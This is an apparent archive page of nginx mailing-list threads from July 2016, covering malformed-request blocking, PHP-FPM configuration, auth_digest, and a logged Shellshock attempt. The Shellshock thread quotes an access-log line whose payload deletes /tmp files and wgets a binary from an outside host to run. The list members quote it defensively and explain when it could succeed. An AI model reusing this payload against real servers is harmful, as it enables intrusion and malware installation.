Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread itpp2012
See https://forum.nginx.org/read.php?2,267651 at this level nginx is not an advanced all layer firewall/ids/dds tool. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268629,268646#msg-268646 ___ nginx mailing list nginx@nginx.org http://mailm

Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread li...@lazygranch.com
On Sat, 30 Jul 2016 23:49:30 +0300 "Valentin V. Bartenev" wrote: > On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote: > > On Sat, 30 Jul 2016 13:18:47 +0300 > > "Valentin V. Bartenev" wrote: > > > > > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote: > > > > I see a fair am

Re: PHP-FPM Integration driving me mad

2016-07-30 Thread Edho Arief
Hi, On Sun, Jul 31, 2016, at 05:44, Simon Hönscheid wrote: > server { >server_name www.example.com; >listen xxx.xxx.xxx.xx:443 ssl http2; >access_log /var/log/nginx/www.example.com-access.log combined; >error_log /var/log/nginx/www.example.com-error.log notice; >ssl_protocols T

Re: PHP-FPM Integration driving me mad

2016-07-30 Thread Simon Hönscheid
Hey, Debian has no selinux. Kind Regards Simon On 30.07.16 at 23:08, Hamza Aboulfeth wrote: Hello, Run into the same issue myself yesterday, try disabling selinux, should fix your issue. Hamza On 30 Jul 2016, at 21:44, Simon Hönscheid wrote: Hello List, due to a Server move, I was

Re: PHP-FPM Integration driving me mad

2016-07-30 Thread Hamza Aboulfeth
Hello, Run into the same issue myself yesterday, try disabling selinux, should fix your issue. Hamza > On 30 Jul 2016, at 21:44, Simon Hönscheid > wrote: > > Hello List, > > due to a Server move, I was setting up a new nginx installation. Some of the > pages need php. So far nothing new.

Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread Valentin V. Bartenev
On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote: > On Sat, 30 Jul 2016 13:18:47 +0300 > "Valentin V. Bartenev" wrote: > > > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote: > > > I see a fair amount of hacking attempts in the access.log. That is, > > > they > > show up wi

PHP-FPM Integration driving me mad

2016-07-30 Thread Simon Hönscheid
Hello List, due to a Server move, I was setting up a new nginx installation. Some of the pages need php. So far nothing new. When I start adding SCRIPT_FILENAME to the php location, it ends up that the script is no longer found. ==> /var/log/nginx/www.example.com-error.log <== 2016/07/30 21

Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread itpp2012
A 400 doesn't reach location blocks. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,268629,268638#msg-268638

Re: Bash script; Was it executed?

2016-07-30 Thread lists
Thanks. I am patched for shellshock. The 200 return code threw me off. Original Message From: Reinis Rozitis Sent: Saturday, July 30, 2016 12:21 PM To: nginx@nginx.org Reply To: nginx@nginx.org Subject: Re: Bash script; Was it executed? > I see a return code of 200. Does that mean this scr

Re: Bash script; Was it executed?

2016-07-30 Thread Reinis Rozitis
I see a return code of 200. Does that mean this script was executed? The return code is for GET request on /. Unless you have an index page that "executes" (typically cgi) referer or browser useragent. It seems as a bash vulnerability (known as shellshock CVE-2014-6271) attempt. rr

Re: Bash script; Was it executed?

2016-07-30 Thread Richard Stanway
Not unless your / location passes the request to a vulnerable cgi-script using a vulnerable version of bash. See https://en.wikipedia.org/wiki/Shellshock_(software_bug) On Sat, Jul 30, 2016 at 7:57 PM, li...@lazygranch.com wrote: > I see a return code of 200. Does that mean this script was exec

Bash script; Was it executed?

2016-07-30 Thread li...@lazygranch.com
I see a return code of 200. Does that mean this script was executed? - 219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma >> /tmp/Run.sh;echo echo

Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread li...@lazygranch.com
On Sat, 30 Jul 2016 13:18:47 +0300 "Valentin V. Bartenev" wrote: > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote: > > I see a fair amount of hacking attempts in the access.log. That is, > > they > show up with a return code of 400 (malformed). Well yeah, they are > certainly malform

Auth_digest not working

2016-07-30 Thread Matthias Fechner
Dear all, I have a very simple webserver running with php-fpm connected (to handle php scripts). It is running perfectly fine without authentication (on a FreeBSD installation). If I enable auth_digest (which is enabled in the FreeBSD port I compiled), I see only in the main error log the line: 2

Re: Hierarchy of malformed requests and blocked IPs

2016-07-30 Thread Valentin V. Bartenev
On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote: > I see a fair amount of hacking attempts in the access.log. That is, they show up with a return code of 400 (malformed). Well yeah, they are certainly malformed. But when I add the offending IP address to my blocked list, they still sh